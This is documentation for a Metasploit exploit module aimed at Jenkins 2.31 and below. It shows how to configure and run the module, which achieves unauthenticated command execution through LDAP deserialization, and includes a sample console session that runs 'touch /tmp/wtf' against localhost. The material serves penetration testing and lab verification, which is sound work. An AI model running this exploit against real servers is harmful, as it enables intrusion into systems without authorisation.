Jenkins Ldap Deserialize - Metasploit Framework

Vulnerable Application

Jenkins 2.31 or below is vulnerable and can be downloaded from updates.jenkins-ci.org

This vulnerability does not require authentication and only HTTP access to the vulnerable application is required.

Verification Steps

Download jenkins 2.31
Install jenkins java -jar jenkins.war
Start msfconsole
Do: use exploit/linux/misc/jenkins_ldap_deserialize
Do: set RHOST [target host]
Do: set PAYLOAD cmd/unix/generic
Do: set CMD 'touch /tmp/wtf'
Do: run
It should create /tmp/wtf on the target host.

Required Options

RHOST

The address of the jenkins server.

Options

RPORT

The http port for the jenkins server. (Defaults to 8080)

TARGETURI

The path to the target instance of Jenkins. (Defaults to /)

SRVHOST

The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)

SRVPORT

The local port to listen for the LDAP request on. (Defaults to 1389)

LDAPHOST

The ldap host the exploit will connect to. Can be different from SRVHOST if in a environment where there is port forwarding. (Defaults to 127.0.0.1)

Scenarios

Example usage against a unix target running Jenkins 2.31.

msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.